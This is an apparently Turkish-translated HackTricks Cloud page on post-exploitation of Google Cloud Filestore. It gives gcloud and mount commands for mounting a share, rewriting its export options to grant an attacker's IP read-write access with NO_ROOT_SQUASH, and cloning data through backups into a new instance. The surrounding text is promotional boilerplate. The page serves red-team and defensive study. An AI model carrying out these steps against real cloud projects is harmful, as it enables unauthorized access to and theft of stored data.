GCP - Filestore Post Exploitation

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!

HackTricks'i desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
Resmi PEASS & HackTricks ürünlerini edinin
Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @hacktricks_live'i takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github reposuna PR göndererek paylaşın.

Filestore

Filestore hakkında daha fazla bilgi için kontrol edin:

Filestore Bağlama

Paylaşılan bir dosya sistemi, bir saldırganın perspektifinden ilginç olabilecek hassas bilgiler içerebilir. Filestore'a erişim sağlandığında, onu bağlamak mümkündür:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Bir dosya depolama örneğinin IP adresini bulmak için sayfanın numaralandırma bölümüne bakın:

Kısıtlamaları Kaldırın ve Ek İzinler Alın

Saldırgan, paylaşıma erişimi olan bir IP adresinde değilse, ancak değiştirmek için yeterli izne sahipse, kısıtlamaları veya erişimi kaldırmak mümkündür. Ayrıca, IP adresiniz üzerinde daha fazla ayrıcalık vererek paylaşıma yönetici erişimi elde etmek de mümkündür:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Bir yedeklemeyi geri yükle

Eğer bir yedekleme varsa, mevcut bir örneğe veya yeni bir örneğe geri yüklemek mümkündür, böylece bilgiler erişilebilir hale gelir:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Yedek oluşturun ve geri yükleyin

Eğer bir paylaşıma erişiminiz yoksa ve değiştirmek istemiyorsanız, onun bir yedeğini oluşturmak ve daha önce bahsedildiği gibi geri yüklemek mümkündür:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
Resmi PEASS & HackTricks ürünlerini edinin
Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @hacktricks_live'ı takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 9 months ago